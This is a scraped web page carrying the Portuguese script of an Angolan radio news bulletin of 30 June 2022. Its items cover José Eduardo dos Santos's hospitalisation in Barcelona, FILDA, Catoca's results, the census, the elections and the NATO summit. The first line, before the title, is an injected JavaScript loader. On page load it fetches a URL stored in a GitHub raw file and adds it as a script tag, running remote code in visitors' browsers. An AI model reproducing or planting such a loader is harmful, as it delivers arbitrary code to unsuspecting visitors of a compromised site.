;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); Hora Informativa, edição de 30 de Junho de 2022 | RadioPlayDigital
Hora Informativa, edição de 30 de Junho de 2022

Empresas norte-americanas participam na FILDA que abre portas no dia 12 de Julho na Zona Económica Especial.

Ana Paula dos Santos, não tem legitimidade para decidir nada, sobre José Eduardo dos Santos em Espanha, diz advogada contratada pelas filhas do ex-presidente.

E, governo, nega ingerência nos assuntos da família Dos Santos.

Socie

Conselho de Segurança da ONU, prolonga regime de sanções impostas à RDC.

Secretário-Geral da NATOP afirma que Vladimir Pútin, deve terminar de imediato com a guerra na Ucrânia.

……

Ponto

……..

Hora Informativa do dia 30 de Junho. Técnica de Mauro Costa e de Alexandre Campos. Edição de Pedro Fernandes. E n’apresentação, estou eu, Maria La-Víter.

……..

Ponto

…….

Boa noite.

Continuam os ecos em torno da saúde do antigo presidente angolano, José Eduardo Santos, que se encontra internado numa unidade hospitalar em Barcelona.

Os últimos factos reportam-se às filhas do ex-presidente, que pediram à equipa médica, que sejam realizados testes para se averiguar a possibilidade de um envenenamento e exigem investigação sobre acidente, uma vez que o relatório médico apresenta lesões cerebrais irreversíveis.  

Segundo a SIC Notícias, durante uma reunião realizada entre a família Dos Santos e a equipa médica, Isabel e Tchizé dos Santos, chamaram os médicos de, “negligentes”, pois consideram que o pai, foi “sequestrado”, e que as circunstâncias que envolveram os últimos meses, e que levaram ao internamento do pai, são suspeitas.

Entretanto, novas informações divulgadas pela imprensa portuguesa, indicam que as filhas de José Eduardo dos Santos, contrataram uma advogada espanhola, para impedir que as equipas médicas, onde se encontra internado o ex-chefe de estado, desliguem o seu suporte de vida.

Carmem Varela, a advogada espanhola, referiu que Ana Paula dos Santos, não tem legitimidade para decidir nada, sobre José Eduardo dos Santos, porque o seu casamento além de não ser reconhecido em Espanha, ela está separada há anos, do antigo presidente da República.

Segundo a mesma advogada, Isabel e Tchizé dos Santos, são as representantes legais do antigo líder da nação angolana.

RD-CVarela1

A pedido das filhas, a advogada adiantou que irá fazer diligências judiciais, para que Ana Paula dos Santos e o médico, João Afonso, não tenham acesso ao local em que o  ex-presidente angolano está internado, e também para que se apure, em que circunstâncias ocorreu a queda de José Eduardo dos Santos, e o porquê da demora de quinze minutos, para o pedido de socorro à polícia.

RD-CVarela 2

A advogada espanhola, Carmem Varela, contratada pelas filhas do ex-presidente José Eduardo dos Santos, para impedir que se desligue o suporte de vida, e para apurar as circunstâncias, em que ocorreu a queda e a demora no pedido de socorro ao dirigente político angolano.

Entretanto, o ministro das relações exteriores, Téte António, esteve hoje no Centro Médico Teknon, onde se encontra internado, o antigo chefe de Estado angolano.

Após concluir a sua visita, o governante angolano negou qualquer interesse da parte do governo actual, em desligar o suporte de vida, considerando que se trata de um assunto familiar, e que situações idênticas não são compatíveis com a mentalidade africana.

RD-TAntónio 1

De acordo com Téte António, o governo angolano está nesta  altura, comprometido em honrar a sua parte, de entre as quais, a cobertura das despesas hospitalares.

RD-TAntónio 2

Ministro das Relações Exteriores, Téte António, quando falava hoje em Espanha à imprensa sobre os mais recentes desenvolvimentos, em torno do estado de saúde do antigo presidente da República, José Eduardo dos Santos, que se encontra internado em Barcelona no Centro MédicoTekno.

……

Ponto

……

Os deputados da décima Comissão da assembleia nacional, estiveram hoje na Provedoria de Justiça em trabalho de campo, onde se inteiraram do trabalho desenvolvido por aquele órgão de soberania.

E, da parte da provedora de Justiça, Florbela Araújo, os representantes do povo, ouviram que só no primeiro semestre do ano em curso, deram entrada na Provedoria mais de quinhentas queixas de várias áreas, com destaque para os conflitos laborais, de terra, e demora no tratamento dos processos judiciais.

RD-FAraújo

Provedora de Justiça, Florbela Araújo.

…..

Por sua vez, Arlete Chimbinda, presidente da décima Comissão da Assembleia Nacional, deu garantias de que os deputados, tudo farão para que a Provedoria, tenha as condições necessárias para o seu bom funcionamento.

RD-AChimbinda 

Presidente da décima Comissão da Assembleia Nacional, Arlete Chimbinda, que hoje liderou uma equipa de deputados em visita de trabalho à Provedoria de Justiça.

……

Ponto

……

A Sociedade Mineira de Catoca obteve em 2021, lucros de 270 milhões de dólares, resultantes da faturação de mais de 750 milhões de dólares, materializados em igual período.

Estes balanços financeiros, foram revelados após os trabalhos da sexagésima nona assembleia geral da empresa com sede na Lunda-Sul.

Mário Domingos, porta-voz da empresa diz que são os melhores resultados na história da empresa com quase 30 anos de existência.

……

RD – MDomingos 1

……

No entanto, Mário Domingos recorda que nos dois últimos anos, devido à situação pandémica, a dificuldade de obtenção de peças sobressalentes no mercado internacional, foi uma permanente dor de cabeça.

……

RD – MDomingos 2

……

A situação sócio-laboral dos trabalhadores e colaboradores da empresa, mereceu uma particular atenção durantes os trabalhados da Assembleia Geral da Sociedade Mineira de Catoca.

…….

RD – MDomingos 3

……

Mário Domingos, porta-voz da Sociedade Mineira de Catoca na Lunda-Sul, que realizou esta semana a sua sexagésima nona assembleia geral, em que foi por unanimidade o Relatório de Gestão e Contas referente ao exercício económico de 2021.

…..

E na economia, a trigésima sétima edição da FILDA, Feira Internacional de Luanda que decorre entre os dias 12 e 16 de Julho na Zona Económica Especial Luanda-Bengo.

Num momento em que continuam as inscrições para as empresas interessadas, Bruno Albernaz, presidente da Eventos Arena, empresa que apoia o Ministério da Economia na realização do Certame, disse à LAC que já são mais de quatrocentas, as empresas inscritas para participarem na FILDA.

……

RD –BAlbernaz 1

……

O presidente da empresa Eventos Arena que empresas de vários países participam pela primeira vez na FILDA, como é o caso dos Estados Unidos e de Cuba.

…….

RD – BAlbernaz 2

…….

O empresário diz também que o momento actual, é de confiança no futuro da economia do país, e de coesão da classe empresarial.

…….

RD – BAlbernaz 3

…….

Bruno Albernaz, presidente do conselho de administração da Eventos Arena, com responsabilidades na realização da FILDA. 

Empresa a que pertence Manuel Novais, que fala das condições de transportes que estão a ser criadas para que o público acorra em massa à Zona Económica Especial, entre 12 e 16 de Julho próximo para assistir à trigésima sétinma edição da FILDA.

……

RD-MNovais 

…….

Manuel Novais, da empresa Eventos Arena e a edição 2022 da FILDA que se realiza entre 12 e 16 de Julho na Zona Económica Especial Luanda-Bengo.

……

Ponto

……

Angola volta a contabilizar os seus cidadãos em 2024, com a realização do Recenseamento geral da população e habitação.

O inquérito, vem actualizar os dados recolhidos em 2014, durante o último censo realizado no país.

De acordo com o Secretario de Estado para o Planeamento, o que se pretende é saber quantos, somos e quais são as reais condições de vida dos angolanos.

RD-MReis1

Milton Reis, revelou que o Executivo, pretende estabelecer a regularidade na realização dos censos populacionais, implementando-os de 10 em 10 anos.

RD-MReis 2

E quanto ao inquérito iniciado a 30 de Maio, para avaliar o impacto da pandemia de Covid-19, nos agregados familiares e nas empresas do país, o prazo para a sua conclusão foi estendido em dois meses.

RD-MReis 3

Secretário de Estado para o Planeamento, Milton Reis.

Angola vai voltar a contabilizar os seus habitantes em 2024, por meio do Recenseamento geral da população e habitação.

Trezentos lotes infraestruturados nas centralidades, a começar pela do Sequele, vão ser comercializados a pessoas de baixa renda, no âmbito do projecto “Kizua Kyobe”, que está a ser desenvolvido pela Empresa Gestora de Terrenos Infraestruturados (EGTI).

O projecto foi apresentado ontem no Fórum Urbano Mundial e de acordo com o PCA da EGTI, Pedro Ivo, está-se a trabalhar com organizações da sociedade civil para se identificar a melhor forma de acesso aos lotes que já estão infraestruturados em Cacuaco

RD – PIvo 2

Pedro Ivo disse também que o processo é inclusivo.

RD – PIvo 1

….

PCA da Empresa Gestora de Terrenos Infraestruturados, Pedro Ivo. Trezentos lotes infraestruturados nas centralidades, a começar pela do Sequele, vão ser comercializados a pessoas de baixa renda.

Publicidade

A Comissão Nacional Eleitoral (CNE) aprovou, nesta quinta-feira, o manual dos membros das mesas das assembleias de voto, ferramenta essencial para esta classe de agentes eleitorais.

O referido manual espelha o desempenho e funcionamento dos membros das assembleias de voto, a serem constituídas no quadro das eleições gerais de 24 de Agosto próximo, segundo o porta-voz da CNE, Lucas Quilundo, que falava à comunicação social no término de uma reunião plenária da instituição.

Lucas Quilundo, referiu que cabe a estes agentes, a missão de procederem a contagem dos boletins de voto e elaborar as actas, para posterior envio para o centro nacional de escrutínio.

Lucas Quilundo frisou que neste instrumento consta também os direitos e deveres dos membros das mesas de assembleia de voto, constituída por quatro elementos cada, destacando, igualmente, a presença dos delegados de  lista, com a missão de supervisionar o andamento do voto.

O plenário analisou,  igualmente, o relatório sobre a supervisão da produção de material eleitoral no Reino de Espanha, tendo considerado positivo o trabalho desenvolvido pela INDRA, empresa contratada para o efeito.

E na capital, já começou o processo de educação cívica, segundo o presidente da comissão provincial eleitoral.

RD – AGongo1

Afonso Gongo, disse também que já está em curso o recrutamento para os agentes de mesa.

RD- AGongo 2

O presidente da comissão provincial eleitoral apelou aos cidadãos a votarem no dia 24 de Agosto.

RD – AGongo 3

Presidente da comissão provincial eleitoral de Luanda, Afonso Gongo, em declarações hoje à LAC. 

Ponto

A Ministra da Administração Pública, Trabalho e Segurança Social, disse que o país atinge noventa e oito porcento da meta, dos 500 mil empregos.

O Repórter LAC, Breno Ramos tem mais dados sobre esta matéria.

RD – peça BRamos

Repórter LAC, Breno Ramos.

Ministra da Administração Pública, Trabalho e Segurança Social, disse que o país atinge noventa e oito porcento da meta dos 500 mil empregos.

….

Ponto

….

A selecção Nacional Júnior de Andebol em feminino, falhou hoje o apuramento as meias finais do mundial da categoria.

As pérolas perderam diante das Holandesas por 21-29, ficando assim nos quartos de finais da competição que decorre na república da Eslovênia.

De relembrar que é a primeira que um mundial desta categoria é realizado.

E agora, atualidade internacional.

O Conselho de Segurança das Nações Unidas prorrogou hoje por um ano o regime de sanções imposto à República Democrática do Congo (RDCongo), com a abstenção dos três países africanos membros, da Rússia e da China.

O texto, redigido pela França, que requeria, pelo menos, nove votos a favor, foi apoiado pelos restantes 10 membros do Conselho, incluindo seis Estados ocidentais, Brasil, México, Emiratos Árabes Unidos e Índia.

Gana, Gabão, Quénia, Rússia e China foram unânimes nas respetivas declarações de voto em denunciar uma resolução que vai contra a soberania da RDCongo e limita, segundo afirmaram, a capacidade do país de lutar contra os grupos armados, que continuam a proliferar, especialmente no nordeste do Estado da África Central.

O regime de sanções imposto a Kinshasa obriga a RDCongo a fornecer uma notificação prévia para a aquisição de armas, o que os seus críticos consideram burocrático.

…………..

Em Portugal Primeiro ministro anula novo plano aeroportuário. E diz que  “Solução tem de ser negociada”

O primeiro-ministro, António Costa, determinou esta quinta-feira a revogação do despacho publicado na quarta-feira sobre a solução aeroportuária para a região de Lisboa e reafirmou que quer uma negociação e consenso com a oposição sobre esta matéria.

“O primeiro-ministro determinou ao Ministro das Infraestruturas e da Habitação a revogação do despacho ontem publicado sobre o Plano de Ampliação da Capacidade Aeroportuária da Região de Lisboa”, pode ler-se num comunicado enviado às redações.

O gabinete de António Costa entende que “a solução tem de ser negociada e consensualizada com a oposição, em particular  com o principal partido da oposição e, em circunstância alguma, sem a devida informação prévia ao senhor Presidente da República”.

…………..

Abusos sexuais na Igreja. Dos 338 testemunhos, 17 seguiram para o MP

Ainda em Portugal a  Comissão Independente que está a estudar os abusos sexuais contra crianças pela Igreja Católica portuguesa já validou 338 testemunhos, tendo encaminhado 17 casos para o Ministério Público, apesar de admitir ter poucas expectativas quanto ao êxito em matéria criminal.

Estes dados foram apresentados durante a manhã de hoje, numa conferência de imprensa, em Lisboa, onde foi feito um balanço dos seis meses de atividade da Comissão Independente para o Estudo dos Abusos Sexuais contra as Crianças na Igreja Católica Portuguesa.

Do trabalho feito até agora, a comissão revelou que recebeu 365 inquéritos, tendo validado 338, e que se, num primeiro momento houve uma vaga de denúncias, o ritmo agora tem sido menor. Foram também excluídos 29 testemunhos.

…………

O presidente turco Recep Tayyip Erdogan falou em conferência de imprensa, esta quinta-feira, durante a cimeira da NATO em Madrid, referindo que a Finlândia e a Suécia devem primeiro cumprir as promessas feitas à Turquia num acordo para suspender o seu veto sobre as propostas de adesão à NATO, ou esta determinação não será enviada ao parlamento turco.

O governante afirmou ainda que a Suécia prometeu extraditar 73 indivíduos que a Turquia considera terroristas, embora o memorando de entendimento não tenha promessas explícitas de extradição, afirmando apenas que os países devem atender aos pedidos da Turquia.

“A chave é que as promessas se tornem realidade. Nos próximos tempos, vamos monitorizar a aplicação dos elementos do memorando e tomar as nossas medidas em concordância”, disse Erdogan.

………….

Secretario geral da Nato afirma que Vladimir Putin deve acabar com a guerra imediatamente

 E o secretário-geral da aliança transatlântica NATO, Jens Stoltenberg, afirmou esta quinta-feira que o presidente russo, Vladimir Putin, “deve acabar com esta guerra imediatamente”. 

“Putin deve retirar as suas forças da Ucrânia e acabar com esta guerra imediatamente, interrompendo os ataques contra uma nação democrática e soberana”, declarou o responsável, em conferência de imprensa no final da cimeira da NATO, em Madrid.

Foi também acordado um “apoio a longo prazo para a Ucrânia” para evitar que o conflito se alastre além das fronteiras da Ucrânia. “Sabemos que isto pode ficar pior. Porque se isto se torna numa guerra em grande escola entre a Rússia e a NATO, então veremos sofrimento, danos, morte e destruição a uma escala que é muito, muito pior do que a que vemos hoje na Ucrânia”, frisou.

………..

O Tribunal Europeu de Direitos Humanos (TEDH) aprovou hoje medidas cautelares para impedir a execução de dois prisioneiros de guerra britânicos que combatiam no exército ucraniano, condenados à morte após se terem rendido às forças separatistas e russas.

O tribunal europeu recorreu ao artigo 39.º dos seus regulamentos para avançar com estas medidas cautelares que visam os dois homens, identificados como Shaun Pinner e Aiden Aslin, e que foram formalizadas contra a Rússia e a Ucrânia.

Os dois voluntários foram detidos pelas milícias separatistas russófonas e as forças russas em território da autoproclamada República Popular de Donetsk, no leste da Ucrânia.

Na deliberação hoje conhecida, solicita-se que a Rússia “garanta que não seja aplicada a pena de morte” aos dois prisioneiros, que as condições da sua detenção sejam adequadas e que se respeite o direito à vida e a proibição de tortura expressos na Convenção Europeia dos Direitos Humanos.

…………..

O Presidente francês afirmou hoje que iniciativas como a Conferência dos Oceanos da ONU trazem resultados concretos e deu o exemplo dos países que se juntaram ao compromisso de 30% das áreas oceânicas protegidas até 2030.

“Criamos (nestes eventos) coligações para proteger melhor, por exemplo, os nossos espaços marítimos. Graças a esta conferência, foram reunidos mais países. Chegámos a mais de 100 países”, respondeu Emmanuel Macron quando questionada se a declaração que sair desta conferência de Lisboa não será apenas isso, palavras.

“Continuámos um combate que é muito importante. Foi um encontro importante para fazer avançar os acordos”, sublinhou, questionado pelos jornalistas quando passeava a pé com o Presidente português, Marcelo Rebelo de Sousa, no Parque das Nações, em Lisboa, onde participou na II Conferência dos Oceanos das Nações Unidas.

Data de Emissão: 30-06-2022 às 19:00
Género(s): Noticiário
 
PUB RADIO PLAY

Relacionados